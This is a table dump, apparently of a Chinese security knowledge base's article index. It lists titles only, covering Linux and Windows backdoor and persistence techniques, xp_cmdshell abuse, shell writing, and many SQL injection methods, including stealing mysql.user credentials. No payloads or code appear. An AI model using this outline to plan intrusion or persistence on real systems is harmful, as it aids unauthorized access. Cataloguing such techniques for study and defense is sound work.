| 1365 | 安全技术  | Linux后门                        | {'id': 6280, 'name': 'inetd 远程后门', 'pid': 210, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 6280, 'title': None}                                                                                    |
| 1366 | 安全技术  | Linux后门                        | {'id': 6281, 'name': '动态链接库后门', 'pid': 210, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 6281, 'title': None}                                                                                       |
| 1367 | 安全技术  | Linux后门                        | {'id': 6282, 'name': 'PROMPT\_COMMAND', 'pid': 210, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 6282, 'title': None}                                                                               |
| 1368 | 安全技术  | Linux后门                        | {'id': 6283, 'name': 'TCP Wrappers', 'pid': 210, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 6283, 'title': None}                                                                                  |
| 1369 | 安全技术  | Windows后门                      | {'id': 6284, 'name': 'shift后门', 'pid': 209, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 6284, 'title': None}                                                                                       |
| 1370 | 安全技术  | Windows后门                      | {'id': 6285, 'name': '映像劫持', 'pid': 209, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 6285, 'title': None}                                                                                          |
| 1371 | 安全技术  | Windows后门                      | {'id': 6286, 'name': '注册表自启动项', 'pid': 209, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 6286, 'title': None}                                                                                       |
| 1372 | 安全技术  | Windows后门                      | {'id': 6287, 'name': '定时任务 ', 'pid': 209, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 6287, 'title': None}                                                                                         |
| 1373 | 安全技术  | Windows后门                      | {'id': 6288, 'name': '用户登陆初始化 ', 'pid': 209, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 6288, 'title': None}                                                                                      |
| 1374 | 安全技术  | Windows后门                      | {'id': 6289, 'name': 'Logon Scripts ', 'pid': 209, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 6289, 'title': None}                                                                                |
| 1375 | 安全技术  | Windows后门                      | {'id': 6290, 'name': '屏幕保护程序 ', 'pid': 209, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 6290, 'title': None}                                                                                       |
| 1376 | 安全技术  | Windows后门                      | {'id': 6291, 'name': '自启动服务 ', 'pid': 209, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 6291, 'title': None}                                                                                        |
| 1377 | 安全技术  | Windows后门                      | {'id': 6292, 'name': '影子用户', 'pid': 209, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 6292, 'title': None}                                                                                          |
| 1378 | 安全技术  | Windows后门                      | {'id': 6293, 'name': 'waitfor', 'pid': 209, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 6293, 'title': None}                                                                                       |
| 1379 | 安全技术  | Windows后门                      | {'id': 6294, 'name': 'CLR', 'pid': 209, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 6294, 'title': None}                                                                                           |
| 1380 | 安全技术  | Windows后门                      | {'id': 6295, 'name': 'Hijack CAccPropServicesClass and MMDeviceEnumerator', 'pid': 209, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 6295, 'title': None}                                           |
| 1381 | 安全技术  | Windows后门                      | {'id': 6296, 'name': '劫持MruPidlList', 'pid': 209, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 6296, 'title': None}                                                                                 |
| 1382 | 安全技术  | Windows后门                      | {'id': 6297, 'name': '文件关联', 'pid': 209, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 6297, 'title': None}                                                                                          |
| 1383 | 安全技术  | Windows后门                      | {'id': 6298, 'name': 'AppInit\_DLLs', 'pid': 209, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 6298, 'title': None}                                                                                 |
| 1384 | 安全技术  | Windows后门                      | {'id': 6299, 'name': 'Netsh helper', 'pid': 209, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 6299, 'title': None}                                                                                  |
| 1385 | 安全技术  | Windows后门                      | {'id': 6300, 'name': '利用BITS', 'pid': 209, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 6300, 'title': None}                                                                                        |
| 1386 | 安全技术  | Windows后门                      | {'id': 6301, 'name': '利用inf文件实现后门', 'pid': 209, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 6301, 'title': None}                                                                                   |
| 1387 | 安全技术  | Windows后门                      | {'id': 7214, 'name': '通过修改目标服务的SDDL语法来实现隐藏服务', 'pid': 209, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 7214, 'title': None}                                                                        |
| 1388 | 安全技术  | Python代码审计                     | {'id': 6541, 'name': 'Python代码审计实战案例总结之反序列化和命令执行', 'pid': 269, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 6541, 'title': None}                                                                    |
| 1389 | 安全技术  | Python代码审计                     | {'id': 6542, 'name': 'Python代码审计和实战案例总结之SQL和ORM注入', 'pid': 269, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 6542, 'title': None}                                                                   |
| 1390 | 安全技术  | Python代码审计                     | {'id': 6543, 'name': 'Python代码审计实战案例总结之CRLF和任意文件读取', 'pid': 269, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 6543, 'title': None}                                                                  |
| 1391 | 安全技术  | SQL 注入                         | {'id': 6302, 'name': 'UDF 手工提权辅助', 'pid': 212, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 6302, 'title': None}                                                                                    |
| 1392 | 安全技术  | SQL 注入                         | {'id': 6303, 'name': 'MOF 手工提权辅助', 'pid': 212, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 6303, 'title': None}                                                                                    |
| 1393 | 安全技术  | SQL 注入                         | {'id': 6304, 'name': 'SA 手工提权辅助', 'pid': 212, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 6304, 'title': None}                                                                                     |
| 1394 | 安全技术  | SQL 注入                         | {'id': 6305, 'name': '通用SQL注入Payloads', 'pid': 213, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 6305, 'title': None}                                                                               |
| 1395 | 安全技术  | SQL 注入                         | {'id': 6306, 'name': '常规 Error Based Payloads', 'pid': 213, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 6306, 'title': None}                                                                       |
| 1396 | 安全技术  | SQL 注入                         | {'id': 6307, 'name': '通用 Time Based SQL Injection Payloads', 'pid': 213, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 6307, 'title': None}                                                          |
| 1397 | 安全技术  | SQL 注入                         | {'id': 6308, 'name': '通用 Union Select Payloads', 'pid': 213, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 6308, 'title': None}                                                                      |
| 1398 | 安全技术  | SQL 注入                         | {'id': 6309, 'name': 'SQL注入 Auth Bypass Payloads', 'pid': 213, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 6309, 'title': None}                                                                    |
| 1399 | 安全技术  | SQL 注入                         | {'id': 6907, 'name': 'SQL Server 默认端口', 'pid': 351, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 6907, 'title': None}                                                                               |
| 1400 | 安全技术  | SQL 注入                         | {'id': 6908, 'name': 'SQL Server 数据合并方法', 'pid': 351, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 6908, 'title': None}                                                                             |
| 1401 | 安全技术  | SQL 注入                         | {'id': 6909, 'name': 'SQL Server 常见运算符', 'pid': 351, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 6909, 'title': None}                                                                              |
| 1402 | 安全技术  | SQL 注入                         | {'id': 6910, 'name': 'SQL Server 字符串长度函数讲解', 'pid': 351, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 6910, 'title': None}                                                                          |
| 1403 | 安全技术  | SQL 注入                         | {'id': 6911, 'name': 'SQL Server 条件语句基本用法', 'pid': 351, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 6911, 'title': None}                                                                           |
| 1404 | 安全技术  | SQL 注入                         | {'id': 6912, 'name': 'SQL Server 字符串截取函数', 'pid': 351, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 6912, 'title': None}                                                                            |
| 1405 | 安全技术  | SQL 注入                         | {'id': 6913, 'name': 'SQL Server 注释符号', 'pid': 351, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 6913, 'title': None}                                                                               |
| 1406 | 安全技术  | SQL 注入                         | {'id': 6914, 'name': 'SQL Server 字符转码函数', 'pid': 351, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 6914, 'title': None}                                                                             |
| 1407 | 安全技术  | SQL 注入                         | {'id': 6915, 'name': 'SQL Server 基本数据查询', 'pid': 351, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 6915, 'title': None}                                                                             |
| 1408 | 安全技术  | SQL 注入                         | {'id': 6845, 'name': 'SQL Server 巧用函数-创建自定义字符串截取函数', 'pid': 341, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 6845, 'title': None}                                                                  |
| 1409 | 安全技术  | SQL 注入                         | {'id': 6846, 'name': 'SQL Server 代替 like 进行模糊搜索的函数', 'pid': 341, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 6846, 'title': None}                                                                  |
| 1410 | 安全技术  | SQL 注入                         | {'id': 6847, 'name': 'SQL Server 条件语句注入小技巧', 'pid': 341, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 6847, 'title': None}                                                                          |
| 1411 | 安全技术  | SQL 注入                         | {'id': 6848, 'name': 'SQL Server 过滤了单引号和逗号-巧用like + 16进制绕过', 'pid': 341, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 6848, 'title': None}                                                          |
| 1412 | 安全技术  | SQL 注入                         | {'id': 6849, 'name': 'SQL Server UPDATE-INSERT-爆错注入', 'pid': 342, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 6849, 'title': None}                                                                 |
| 1413 | 安全技术  | SQL 注入                         | {'id': 6850, 'name': 'SQL Server INSERT-UPDATE-普通注入', 'pid': 342, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 6850, 'title': None}                                                                 |
| 1414 | 安全技术  | SQL 注入                         | {'id': 6851, 'name': '0x01 前言', 'pid': 343, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 6851, 'title': None}                                                                                       |
| 1415 | 安全技术  | SQL 注入                         | {'id': 6852, 'name': '0x02\xa0删除系统存储过程失败的问题', 'pid': 343, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 6852, 'title': None}                                                                         |
| 1416 | 安全技术  | SQL 注入                         | {'id': 6853, 'name': '0x03\xa0判断是否存在xp\_cmdshell存储过程', 'pid': 343, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 6853, 'title': None}                                                                |
| 1417 | 安全技术  | SQL 注入                         | {'id': 6854, 'name': '0x04 判断 xp\_cmdshell 是否开启', 'pid': 343, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 6854, 'title': None}                                                                     |
| 1418 | 安全技术  | SQL 注入                         | {'id': 6855, 'name': '0x05 恢复xp\_cmdshell存储过程', 'pid': 343, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 6855, 'title': None}                                                                       |
| 1419 | 安全技术  | SQL 注入                         | {'id': 6856, 'name': '0x06\xa0xp\_cmdshell 执行命令', 'pid': 343, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 6856, 'title': None}                                                                     |
| 1420 | 安全技术  | SQL 注入                         | {'id': 6857, 'name': '0x07\xa0sp\_oacreate (添加管理员)\xa0', 'pid': 343, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 6857, 'title': None}                                                              |
| 1421 | 安全技术  | SQL 注入                         | {'id': 6858, 'name': '0x08\xa0sp\_makewebtask (写shell)', 'pid': 343, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 6858, 'title': None}                                                              |
| 1422 | 安全技术  | SQL 注入                         | {'id': 6859, 'name': '0x09\xa0wscript.shell (添加管理员)', 'pid': 343, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 6859, 'title': None}                                                                 |
| 1423 | 安全技术  | SQL 注入                         | {'id': 6860, 'name': '0x10\xa0Shell.Application (添加用户)', 'pid': 343, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 6860, 'title': None}                                                              |
| 1424 | 安全技术  | SQL 注入                         | {'id': 6861, 'name': '0x11\xa0沙盒模式(百度抄的)', 'pid': 343, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 6861, 'title': None}                                                                            |
| 1425 | 安全技术  | SQL 注入                         | {'id': 6862, 'name': '0x12 差异备份拿shell', 'pid': 343, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 6862, 'title': None}                                                                               |
| 1426 | 安全技术  | SQL 注入                         | {'id': 6863, 'name': '0x13\xa0log备份拿shell', 'pid': 343, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 6863, 'title': None}                                                                           |
| 1427 | 安全技术  | SQL 注入                         | {'id': 6864, 'name': 'SQL Server OrderBy注入-爆错注入', 'pid': 344, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 6864, 'title': None}                                                                     |
| 1428 | 安全技术  | SQL 注入                         | {'id': 6865, 'name': 'SQL Server OrderBy注入-延时注入', 'pid': 344, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 6865, 'title': None}                                                                     |
| 1429 | 安全技术  | SQL 注入                         | {'id': 6866, 'name': 'SQL Server OrderBy注入-布尔盲注', 'pid': 344, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 6866, 'title': None}                                                                     |
| 1430 | 安全技术  | SQL 注入                         | {'id': 6867, 'name': 'SQL Server 时间盲注-if-条件判断', 'pid': 345, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 6867, 'title': None}                                                                       |
| 1431 | 安全技术  | SQL 注入                         | {'id': 6868, 'name': 'SQL Server 布尔盲注-iif-条件判断', 'pid': 345, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 6868, 'title': None}                                                                      |
| 1432 | 安全技术  | SQL 注入                         | {'id': 6869, 'name': '0x01 前言', 'pid': 347, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 6869, 'title': None}                                                                                       |
| 1433 | 安全技术  | SQL 注入                         | {'id': 6870, 'name': '0x02 基础数据', 'pid': 347, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 6870, 'title': None}                                                                                     |
| 1434 | 安全技术  | SQL 注入                         | {'id': 6871, 'name': '0x03\xa0算术运算符-爆错注入', 'pid': 347, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 6871, 'title': None}                                                                            |
| 1435 | 安全技术  | SQL 注入                         | {'id': 6872, 'name': '0x04\xa0convert(int,str) 函数-爆错注入', 'pid': 347, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 6872, 'title': None}                                                              |
| 1436 | 安全技术  | SQL 注入                         | {'id': 6873, 'name': '0x05\xa0CAST(expressionASdata\_type) 函数-爆错注入', 'pid': 347, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 6873, 'title': None}                                                  |
| 1437 | 安全技术  | SQL 注入                         | {'id': 6874, 'name': '0x06\xa0db\_name() 函数-爆错注入', 'pid': 347, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 6874, 'title': None}                                                                    |
| 1438 | 安全技术  | SQL 注入                         | {'id': 6875, 'name': '0x07\xa0COL\_NAME(table\_id , column\_id) 函数-爆错注入', 'pid': 347, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 6875, 'title': None}                                             |
| 1439 | 安全技术  | SQL 注入                         | {'id': 6876, 'name': '0x08\xa0 filegroup\_name() 函数-爆错注入', 'pid': 347, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 6876, 'title': None}                                                            |
| 1440 | 安全技术  | SQL 注入                         | {'id': 6877, 'name': '0x09\xa0 object\_name() 函数-爆错注入', 'pid': 347, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 6877, 'title': None}                                                               |
| 1441 | 安全技术  | SQL 注入                         | {'id': 6878, 'name': '0x10\xa0 suser\_name() 函数-爆错注入', 'pid': 347, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 6878, 'title': None}                                                                |
| 1442 | 安全技术  | SQL 注入                         | {'id': 6879, 'name': '0x11 user\_name() 函数 -爆错注入', 'pid': 347, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 6879, 'title': None}                                                                    |
| 1443 | 安全技术  | SQL 注入                         | {'id': 6880, 'name': '0x12 schema\_name() 函数-爆错注入', 'pid': 347, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 6880, 'title': None}                                                                   |
| 1444 | 安全技术  | SQL 注入                         | {'id': 6881, 'name': '0x13 type\_name() 函数-爆错注入', 'pid': 347, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 6881, 'title': None}                                                                     |
| 1445 | 安全技术  | SQL 注入                         | {'id': 6882, 'name': '0x14 file\_name() 函数-爆错注入', 'pid': 347, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 6882, 'title': None}                                                                     |
| 1446 | 安全技术  | SQL 注入                         | {'id': 6883, 'name': '0x00 测试数据', 'pid': 348, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 6883, 'title': None}                                                                                     |
| 1447 | 安全技术  | SQL 注入                         | {'id': 6884, 'name': '0x01 爆数据库版本', 'pid': 348, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 6884, 'title': None}                                                                                   |
| 1448 | 安全技术  | SQL 注入                         | {'id': 6885, 'name': '0x02 爆当前连接用户', 'pid': 348, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 6885, 'title': None}                                                                                  |
| 1449 | 安全技术  | SQL 注入                         | {'id': 6886, 'name': '0x03 爆当前连接的数据库', 'pid': 348, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 6886, 'title': None}                                                                                |
| 1450 | 安全技术  | SQL 注入                         | {'id': 6887, 'name': '0x04 爆库名', 'pid': 348, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 6887, 'title': None}                                                                                      |
| 1451 | 安全技术  | SQL 注入                         | {'id': 6888, 'name': '0x05 爆表名', 'pid': 348, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 6888, 'title': None}                                                                                      |
| 1452 | 安全技术  | SQL 注入                         | {'id': 6889, 'name': '0x06 暴字段', 'pid': 348, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 6889, 'title': None}                                                                                      |
| 1453 | 安全技术  | SQL 注入                         | {'id': 6890, 'name': '0x07 爆内容', 'pid': 348, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 6890, 'title': None}                                                                                      |
| 1454 | 安全技术  | SQL 注入                         | {'id': 6891, 'name': '0x00 测试数据', 'pid': 349, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 6891, 'title': None}                                                                                     |
| 1455 | 安全技术  | SQL 注入                         | {'id': 6892, 'name': '0x01 爆库名', 'pid': 349, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 6892, 'title': None}                                                                                      |
| 1456 | 安全技术  | SQL 注入                         | {'id': 6893, 'name': '0x02 爆表名', 'pid': 349, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 6893, 'title': None}                                                                                      |
| 1457 | 安全技术  | SQL 注入                         | {'id': 6894, 'name': '0x03 暴字段', 'pid': 349, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 6894, 'title': None}                                                                                      |
| 1458 | 安全技术  | SQL 注入                         | {'id': 6895, 'name': '0x04 爆内容', 'pid': 349, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 6895, 'title': None}                                                                                      |
| 1459 | 安全技术  | SQL 注入                         | {'id': 6896, 'name': '0x00 概要', 'pid': 350, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 6896, 'title': None}                                                                                       |
| 1460 | 安全技术  | SQL 注入                         | {'id': 6897, 'name': '0x01 测试数据', 'pid': 350, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 6897, 'title': None}                                                                                     |
| 1461 | 安全技术  | SQL 注入                         | {'id': 6898, 'name': '0x02 查看列数', 'pid': 350, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 6898, 'title': None}                                                                                     |
| 1462 | 安全技术  | SQL 注入                         | {'id': 6899, 'name': '0x03 爆当前连接用户', 'pid': 350, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 6899, 'title': None}                                                                                  |
| 1463 | 安全技术  | SQL 注入                         | {'id': 6900, 'name': '0x04 爆当前连接的数据库', 'pid': 350, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 6900, 'title': None}                                                                                |
| 1464 | 安全技术  | SQL 注入                         | {'id': 6901, 'name': '0x05 爆库名方法一', 'pid': 350, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 6901, 'title': None}                                                                                   |
| 1465 | 安全技术  | SQL 注入                         | {'id': 6902, 'name': '0x06 爆库名方法二', 'pid': 350, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 6902, 'title': None}                                                                                   |
| 1466 | 安全技术  | SQL 注入                         | {'id': 6903, 'name': '0x06 爆库名方法三', 'pid': 350, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 6903, 'title': None}                                                                                   |
| 1467 | 安全技术  | SQL 注入                         | {'id': 6904, 'name': '0x07 爆表名', 'pid': 350, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 6904, 'title': None}                                                                                      |
| 1468 | 安全技术  | SQL 注入                         | {'id': 6905, 'name': '0x08 暴字段', 'pid': 350, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 6905, 'title': None}                                                                                      |
| 1469 | 安全技术  | SQL 注入                         | {'id': 6906, 'name': '0x09 爆内容', 'pid': 350, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 6906, 'title': None}                                                                                      |
| 1470 | 安全技术  | SQL 注入                         | {'id': 7251, 'name': 'DNS Out-of-Band', 'pid': 449, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 7251, 'title': None}                                                                               |
| 1471 | 安全技术  | SQL 注入                         | {'id': 7252, 'name': 'Alternative Error-Based vectors', 'pid': 449, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 7252, 'title': None}                                                               |
| 1472 | 安全技术  | SQL 注入                         | {'id': 7253, 'name': '快速利用：在一个查询中检索整个表', 'pid': 449, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 7253, 'title': None}                                                                              |
| 1473 | 安全技术  | SQL 注入                         | {'id': 7254, 'name': 'Reading local files', 'pid': 449, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 7254, 'title': None}                                                                           |
| 1474 | 安全技术  | SQL 注入                         | {'id': 7255, 'name': '检索当前查询', 'pid': 449, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 7255, 'title': None}                                                                                        |
| 1475 | 安全技术  | SQL 注入                         | {'id': 6916, 'name': 'MySQL 数据合并方法', 'pid': 353, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 6916, 'title': None}                                                                                  |
| 1476 | 安全技术  | SQL 注入                         | {'id': 6917, 'name': 'MySQL 常见运算符', 'pid': 353, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 6917, 'title': None}                                                                                   |
| 1477 | 安全技术  | SQL 注入                         | {'id': 6918, 'name': 'MySQL 字符串长度函数讲解', 'pid': 353, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 6918, 'title': None}                                                                               |
| 1478 | 安全技术  | SQL 注入                         | {'id': 6919, 'name': 'MySQL 条件语句基本用法', 'pid': 353, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 6919, 'title': None}                                                                                |
| 1479 | 安全技术  | SQL 注入                         | {'id': 6920, 'name': 'MySQL 字符串截取函数', 'pid': 353, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 6920, 'title': None}                                                                                 |
| 1480 | 安全技术  | SQL 注入                         | {'id': 6921, 'name': 'MySQL 注释符号', 'pid': 353, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 6921, 'title': None}                                                                                    |
| 1481 | 安全技术  | SQL 注入                         | {'id': 6922, 'name': 'MySQL 字符转码函数', 'pid': 353, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 6922, 'title': None}                                                                                  |
| 1482 | 安全技术  | SQL 注入                         | {'id': 6923, 'name': 'MySQL 基本数据查询', 'pid': 353, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 6923, 'title': None}                                                                                  |
| 1483 | 安全技术  | SQL 注入                         | {'id': 6924, 'name': 'MySQL 注入点无数据进行布尔延迟盲注的方法', 'pid': 354, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 6924, 'title': None}                                                                       |
| 1484 | 安全技术  | SQL 注入                         | {'id': 6925, 'name': 'MySQL 5.7之后版本新增的一些对注入友好的特性', 'pid': 354, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 6925, 'title': None}                                                                    |
| 1485 | 安全技术  | SQL 注入                         | {'id': 6926, 'name': 'MySQL 过滤like时的另类盲注方法', 'pid': 354, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 6926, 'title': None}                                                                          |
| 1486 | 安全技术  | SQL 注入                         | {'id': 6927, 'name': 'MySQL 另类判断版本号的方法', 'pid': 354, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 6927, 'title': None}                                                                              |
| 1487 | 安全技术  | SQL 注入                         | {'id': 6928, 'name': 'MySQL 在不知道列名的情况下泄露数据的SQL注入技巧', 'pid': 354, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 6928, 'title': None}                                                                  |
| 1488 | 安全技术  | SQL 注入                         | {'id': 6929, 'name': 'MySQL dns注入例子', 'pid': 355, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 6929, 'title': None}                                                                                 |
| 1489 | 安全技术  | SQL 注入                         | {'id': 6930, 'name': 'MySQL update 延时盲注', 'pid': 356, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 6930, 'title': None}                                                                             |
| 1490 | 安全技术  | SQL 注入                         | {'id': 6931, 'name': 'MySQL insert 爆错注入', 'pid': 356, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 6931, 'title': None}                                                                             |
| 1491 | 安全技术  | SQL 注入                         | {'id': 6932, 'name': 'MySQL insert 普通注入', 'pid': 356, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 6932, 'title': None}                                                                             |
| 1492 | 安全技术  | SQL 注入                         | {'id': 6933, 'name': 'MySQL limit 爆错注入-注入语句中有orderBy的注入方法-只适用于小于5.6.6的5.x系列', 'pid': 357, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 6933, 'title': None}                                         |
| 1493 | 安全技术  | SQL 注入                         | {'id': 6934, 'name': 'MySQL limit union延时盲注-注入语句中没有orderBy的注入方法-只适用于小于5.6.6的5.x系列', 'pid': 357, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 6934, 'title': None}                                   |
| 1494 | 安全技术  | SQL 注入                         | {'id': 6935, 'name': 'MySQL limit union注入-注入语句中没有orderBy的注入方法-只适用于小于5.6.6的5.x系列', 'pid': 357, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 6935, 'title': None}                                     |
| 1495 | 安全技术  | SQL 注入                         | {'id': 6936, 'name': 'MySQL limit 注入中使用into查列数方法', 'pid': 357, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 6936, 'title': None}                                                                    |
| 1496 | 安全技术  | SQL 注入                         | {'id': 6937, 'name': 'MySQL OrderBy 注入点-case-条件判断绕过括号过滤', 'pid': 358, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 6937, 'title': None}                                                             |
| 1497 | 安全技术  | SQL 注入                         | {'id': 6938, 'name': 'MySQL OrderBy 注入点-爆错注入', 'pid': 358, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 6938, 'title': None}                                                                        |
| 1498 | 安全技术  | SQL 注入                         | {'id': 6939, 'name': 'MySQL OrderBy 注入点-布尔盲注', 'pid': 358, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 6939, 'title': None}                                                                        |
| 1499 | 安全技术  | SQL 注入                         | {'id': 6940, 'name': 'MySQL 窃取 mysql.user 账号密码小小小例子', 'pid': 359, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 6940, 'title': None}                                                                 |
| 1500 | 安全技术  | SQL 注入                         | {'id': 6941, 'name': 'MySQL 读文件-写文件例子', 'pid': 360, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 6941, 'title': None}                                                                               |
| 1501 | 安全技术  | SQL 注入                         | {'id': 6942, 'name': 'MySQL 布尔盲注-case-条件判断-不能出现( ) 判断注入的方法', 'pid': 361, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 6942, 'title': None}                                                          |
| 1502 | 安全技术  | SQL 注入                         | {'id': 6943, 'name': 'MySQL 布尔盲注-正则表达式(REGEXP)-实现模糊搜索的方法', 'pid': 361, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 6943, 'title': None}                                                            |
| 1503 | 安全技术  | SQL 注入                         | {'id': 6944, 'name': 'MySQL 有关延时的3种通用方法-不通用的不计入', 'pid': 361, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 6944, 'title': None}                                                                     |
| 1504 | 安全技术  | SQL 注入                         | {'id': 6945, 'name': 'MySQL 布尔盲注-if-条件判断', 'pid': 361, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 6945, 'title': None}                                                                            |
